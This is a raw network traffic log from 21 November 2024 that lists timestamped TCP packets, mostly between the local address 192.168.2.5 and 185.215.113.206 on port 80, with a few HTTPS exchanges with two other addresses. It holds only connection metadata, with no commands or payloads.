                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.622884989 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.622997046 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.623025894 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.623132944 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.624205112 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.624313116 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.624346972 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.624399900 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.625627995 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.625711918 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.625715017 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.625858068 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.626975060 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.627037048 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.627038956 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.627132893 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.628268003 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.628338099 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.628366947 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.628381968 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.629652023 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.629746914 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.629765987 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.629862070 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.630943060 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.630995989 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.631036043 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.631129026 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.632318020 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.632381916 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.632406950 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.632457972 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.633692026 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.633707047 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.633764982 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.633764982 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.634994984 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.635090113 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.635092020 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.635188103 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.636338949 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.636420012 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.636456013 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.636527061 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.637682915 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.637773037 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.637804985 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.637907982 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.639111042 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.639127016 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.639283895 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.640362024 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.640417099 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.640485048 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.640536070 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.641726017 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.641788006 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.641812086 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.641854048 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.643064022 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.643115044 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.643178940 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.643229961 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.644428968 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.644512892 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.644555092 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.644609928 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.645792007 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.645839930 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.645898104 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.645951033 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.647139072 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.647197008 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.647286892 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.647341013 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.648446083 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.648521900 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.648541927 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.648618937 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.649863958 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.649897099 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.649935007 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.649935961 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.651164055 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.651256084 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.651268005 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.651334047 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.652524948 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.652628899 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.652852058 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.653841972 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.653920889 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.654000998 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.654172897 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.655194044 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.655249119 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.655287981 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.655432940 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.656579018 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.656667948 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.656869888 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.683471918 CET44349826172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.683754921 CET49826443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.683788061 CET44349826172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.685218096 CET44349826172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.685281038 CET49826443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.685626030 CET49826443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.685710907 CET44349826172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.735842943 CET49823443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.735874891 CET49826443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.735878944 CET49821443192.168.2.513.107.246.45
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.735887051 CET44349826172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.775753021 CET44349825172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.776051044 CET49825443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.776062965 CET44349825172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.776913881 CET44349825172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.776978970 CET49825443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.777290106 CET49825443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.777345896 CET44349825172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.777576923 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.777617931 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.777847052 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.778172970 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.778208017 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.778250933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.778250933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.779045105 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.779135942 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.779182911 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.779246092 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.780289888 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.780343056 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.780344963 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.780400991 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.781373978 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.781443119 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.781450987 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.781568050 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.782509089 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.782643080 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.782700062 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.782701015 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.783658981 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.783766031 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.783771992 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.783852100 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.784789085 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.784863949 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.784919977 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.785008907 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.785955906 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.786036015 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.786067963 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.786206961 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.787074089 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.787137985 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.787198067 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.787249088 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.788224936 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.788300037 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.788353920 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.788424015 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.789408922 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.789465904 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.789511919 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.789587975 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.790532112 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.790647984 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.790653944 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.790719032 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.791677952 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.791759968 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.791927099 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.792045116 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.792814970 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.792867899 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.792923927 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.792923927 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.793960094 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.794085026 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.794157982 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.795123100 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.795222044 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.795258045 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.795335054 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.796267986 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.796324968 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.796372890 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.797457933 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.797508955 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.797569036 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.797730923 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.798556089 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.798603058 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.798650980 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.798712015 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.799742937 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.799813032 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.799860954 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.799910069 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.800851107 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.800898075 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.800966978 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.801043987 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.802005053 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.802066088 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.802098989 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.802149057 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.803164005 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.803225040 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.803261995 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.803358078 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.804306984 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.804373980 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.804439068 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.804491997 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.805465937 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.805519104 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.805574894 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.805700064 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.806601048 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.806654930 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.806695938 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.806798935 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.807763100 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.807864904 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.807898045 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.808003902 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.808914900 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.808970928 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.809037924 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.809084892 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.810122967 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.810220003 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.810252905 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.810308933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.811194897 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.811255932 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.811288118 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.811347961 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.812350988 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.812479973 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.812484980 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.812701941 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.813534975 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.813592911 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.813630104 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.813786030 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.814659119 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.814742088 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.814837933 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.815812111 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.815918922 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.816044092 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.816932917 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.817029953 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.817039013 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.817276955 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.818114996 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.818130970 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.818314075 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.819257021 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.819318056 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.819318056 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.819423914 CET4977380192.168.2.5185.215.113.206
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.820383072 CET8049773185.215.113.206192.168.2.5
                                                                                                                                                                                                                                                        Nov 21, 2024 00:49:37.820437908 CET4977380192.168.2.5185.215.113.206
